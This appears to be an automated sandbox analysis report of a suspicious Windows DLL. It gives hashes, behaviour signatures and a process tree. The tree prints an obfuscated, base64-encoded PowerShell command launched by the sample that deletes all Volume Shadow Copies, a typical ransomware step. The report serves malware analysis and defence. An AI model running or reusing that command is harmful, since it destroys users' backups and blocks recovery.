Analysis

  • max time kernel
    117s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:48

General

  • Target

    e6af534b1dbee86e294e4110dd70a1dd089feef0c7e4c9946abac7b988fe7763.dll

  • Size

    116KB

  • MD5

    702a5f7d6573f99ae843fd158e46b645

  • SHA1

    f0c2ee326177d951cddec0ac67a0234cb88301e5

  • SHA256

    e6af534b1dbee86e294e4110dd70a1dd089feef0c7e4c9946abac7b988fe7763

  • SHA512

    d766377d0c6022aab88ff070a7959a49c740c43c799230a65e8c3a221c034413e397bbdfd8848bcab5b9df1feff72f4f3ced37ed72b0088df699367196800d1d

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\e6af534b1dbee86e294e4110dd70a1dd089feef0c7e4c9946abac7b988fe7763.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\e6af534b1dbee86e294e4110dd70a1dd089feef0c7e4c9946abac7b988fe7763.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:708
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1644

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/708-55-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp
    Filesize

    8KB

  • memory/708-57-0x00000000024B0000-0x00000000024B2000-memory.dmp
    Filesize

    8KB

  • memory/708-58-0x00000000024B2000-0x00000000024B4000-memory.dmp
    Filesize

    8KB

  • memory/708-59-0x00000000024B4000-0x00000000024B7000-memory.dmp
    Filesize

    12KB

  • memory/708-56-0x000007FEF31E0000-0x000007FEF3D3D000-memory.dmp
    Filesize

    11.4MB

  • memory/708-60-0x00000000024BB000-0x00000000024DA000-memory.dmp
    Filesize

    124KB

  • memory/864-54-0x0000000076121000-0x0000000076123000-memory.dmp
    Filesize

    8KB